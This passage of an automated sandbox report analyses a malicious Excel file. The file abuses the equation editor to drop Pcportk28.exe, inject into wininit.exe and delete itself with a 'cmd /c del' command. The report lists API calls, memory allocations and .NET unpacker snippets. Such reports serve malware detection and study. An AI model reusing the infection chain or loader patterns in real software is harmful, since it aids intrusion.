          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0089D47D5_2_0089D47D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E05E35_2_008E05E3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0087C5F05_2_0087C5F0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086351F5_2_0086351F
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008A65405_2_008A6540
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008646805_2_00864680
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086E6C15_2_0086E6C1
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_009026225_2_00902622
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008AA6345_2_008AA634
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E579A5_2_008E579A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086C7BC5_2_0086C7BC
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008957C35_2_008957C3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008DF8C45_2_008DF8C4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008FF8EE5_2_008FF8EE
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086C85C5_2_0086C85C
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0088286D5_2_0088286D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0090098E5_2_0090098E
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008629B25_2_008629B2
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008769FE5_2_008769FE
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E394B5_2_008E394B
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E59555_2_008E5955
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00913A835_2_00913A83
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0090CBA45_2_0090CBA4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E6BCB5_2_008E6BCB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085FBD75_2_0085FBD7
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008EDBDA5_2_008EDBDA
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00887B005_2_00887B00
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008FFDDD5_2_008FFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D12387_2_025D1238
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252E2E97_2_0252E2E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025373537_2_02537353
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0257A37B7_2_0257A37B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025323057_2_02532305
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025563DB7_2_025563DB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252F3CF7_2_0252F3CF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D63BF7_2_025D63BF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254905A7_2_0254905A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025330407_2_02533040
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255D0057_2_0255D005
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252E0C67_2_0252E0C6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0257A6347_2_0257A634
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D26227_2_025D2622
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253E6C17_2_0253E6C1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025346807_2_02534680
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025657C37_2_025657C3
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B579A7_2_025B579A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253C7BC7_2_0253C7BC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0256D47D7_2_0256D47D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B443E7_2_025B443E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025654857_2_02565485
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025414897_2_02541489
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025765407_2_02576540
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253351F7_2_0253351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254C5F07_2_0254C5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025E3A837_2_025E3A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02557B007_2_02557B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025BDBDA7_2_025BDBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252FBD77_2_0252FBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025DCBA47_2_025DCBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253C85C7_2_0253C85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255286D7_2_0255286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CF8EE7_2_025CF8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B59557_2_025B5955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B394B7_2_025B394B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025469FE7_2_025469FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D098E7_2_025D098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025329B27_2_025329B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254EE4C7_2_0254EE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02562E2F7_2_02562E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255DF7C7_2_0255DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02540F3F7_2_02540F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025A2FDC7_2_025A2FDC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CCFB17_2_025CCFB1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253CD5B7_2_0253CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02560D3B7_2_02560D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CFDDD7_2_025CFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FC9487_2_000FC948
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E8C807_2_000E8C80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D8A7_2_000E2D8A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D907_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2FB07_2_000E2FB0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0259F970 appears 82 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 02573F92 appears 132 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0257373B appears 245 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0252E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0252DF5C appears 119 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 0085E2A8 appears 36 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008CF970 appears 78 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008A373B appears 214 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 008A3F92 appears 110 times
          Source: C:\Users\Public\Pcportk28.exeCode function: String function: 0085DF5C appears 105 times
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004185E0 NtCreateFile,5_2_004185E0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00418690 NtReadFile,5_2_00418690
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00418710 NtClose,5_2_00418710
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,5_2_004187C0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004185DA NtCreateFile,5_2_004185DA
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041870B NtClose,5_2_0041870B
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008500C4 NtCreateFile,LdrInitializeThunk,5_2_008500C4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00850048
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850078 NtResumeThread,LdrInitializeThunk,5_2_00850078
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008507AC NtCreateMutant,LdrInitializeThunk,5_2_008507AC
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F9F0 NtClose,LdrInitializeThunk,5_2_0084F9F0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F900 NtReadFile,LdrInitializeThunk,5_2_0084F900
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0084FAD0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0084FAE8
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0084FBB8
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0084FB68
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0084FC90
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0084FC60
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FD8C NtDelayExecution,LdrInitializeThunk,5_2_0084FD8C
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0084FDC0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0084FEA0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0084FED0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FFB4 NtCreateSection,LdrInitializeThunk,5_2_0084FFB4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008510D0 NtOpenProcessToken,5_2_008510D0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850060 NtQuerySection,5_2_00850060
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008501D4 NtSetValueKey,5_2_008501D4
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085010C NtOpenDirectoryObject,5_2_0085010C
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851148 NtOpenThread,5_2_00851148
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F8CC NtWaitForSingleObject,5_2_0084F8CC
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851930 NtSetContextThread,5_2_00851930
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084F938 NtWriteFile,5_2_0084F938
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FAB8 NtQueryValueKey,5_2_0084FAB8
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FA20 NtQueryInformationFile,5_2_0084FA20
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FA50 NtEnumerateValueKey,5_2_0084FA50
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FBE8 NtQueryVirtualMemory,5_2_0084FBE8
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FB50 NtCreateKey,5_2_0084FB50
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC30 NtOpenProcess,5_2_0084FC30
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00850C40 NtGetContextThread,5_2_00850C40
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0084FC48 NtSetInformationFile,5_2_0084FC48
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00851D80 NtSuspendThread,5_2_00851D80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025200C4 NtCreateFile,LdrInitializeThunk,7_2_025200C4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025207AC NtCreateMutant,LdrInitializeThunk,7_2_025207AC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0251FAD0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0251FAE8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0251FAB8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FB50 NtCreateKey,LdrInitializeThunk,7_2_0251FB50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0251FB68
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0251FBB8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F900 NtReadFile,LdrInitializeThunk,7_2_0251F900
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F9F0 NtClose,LdrInitializeThunk,7_2_0251F9F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0251FED0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FFB4 NtCreateSection,LdrInitializeThunk,7_2_0251FFB4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0251FC60
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0251FDC0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FD8C NtDelayExecution,LdrInitializeThunk,7_2_0251FD8C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520048 NtProtectVirtualMemory,7_2_02520048
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520078 NtResumeThread,7_2_02520078
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520060 NtQuerySection,7_2_02520060
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025210D0 NtOpenProcessToken,7_2_025210D0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521148 NtOpenThread,7_2_02521148
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252010C NtOpenDirectoryObject,7_2_0252010C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025201D4 NtSetValueKey,7_2_025201D4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FA50 NtEnumerateValueKey,7_2_0251FA50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FA20 NtQueryInformationFile,7_2_0251FA20
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FBE8 NtQueryVirtualMemory,7_2_0251FBE8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F8CC NtWaitForSingleObject,7_2_0251F8CC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521930 NtSetContextThread,7_2_02521930
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251F938 NtWriteFile,7_2_0251F938
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FE24 NtWriteVirtualMemory,7_2_0251FE24
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FEA0 NtReadVirtualMemory,7_2_0251FEA0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FF34 NtQueueApcThread,7_2_0251FF34
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FFFC NtCreateProcessEx,7_2_0251FFFC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02520C40 NtGetContextThread,7_2_02520C40
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC48 NtSetInformationFile,7_2_0251FC48
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC30 NtOpenProcess,7_2_0251FC30
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FC90 NtUnmapViewOfSection,7_2_0251FC90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0251FD5C NtEnumerateKey,7_2_0251FD5C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02521D80 NtSuspendThread,7_2_02521D80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F85E0 NtCreateFile,7_2_000F85E0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F8690 NtReadFile,7_2_000F8690
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F8710 NtClose,7_2_000F8710
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F87C0 NtAllocateVirtualMemory,7_2_000F87C0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F85DA NtCreateFile,7_2_000F85DA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000F870B NtClose,7_2_000F870B
          Source: 7916.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msvbvm60.dllJump to behavior
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: i4L[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Pcportk28.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exeJump to behavior
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR379.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@6/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\Pcportk28.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\Pcportk28.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: SWIFT - Copy - Copy.xlsxStatic file information: File size 1400294 > 1048576
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: SWIFT - Copy - Copy.xlsxInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: i4L[1].exe.2.dr, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Pcportk28.exe.2.dr, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)Show sources
          Source: i4L[1].exe.2.dr, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: Pcportk28.exe.2.dr, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010E9A2A push es; retf 4_2_010E9A37
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010E9767 push 3A000004h; retf 0000h4_2_010E976C
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_010EA0FF push es; iretd 4_2_010EA151
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004153E0 push es; retf 5_2_004153E9
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00415C4E push ebp; ret 5_2_00415C57
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041CD74 push eax; ret 5_2_0041CD76
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00414EAF pushad ; ret 5_2_00414EB0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041CF70 pushad ; ret 5_2_0041CF74
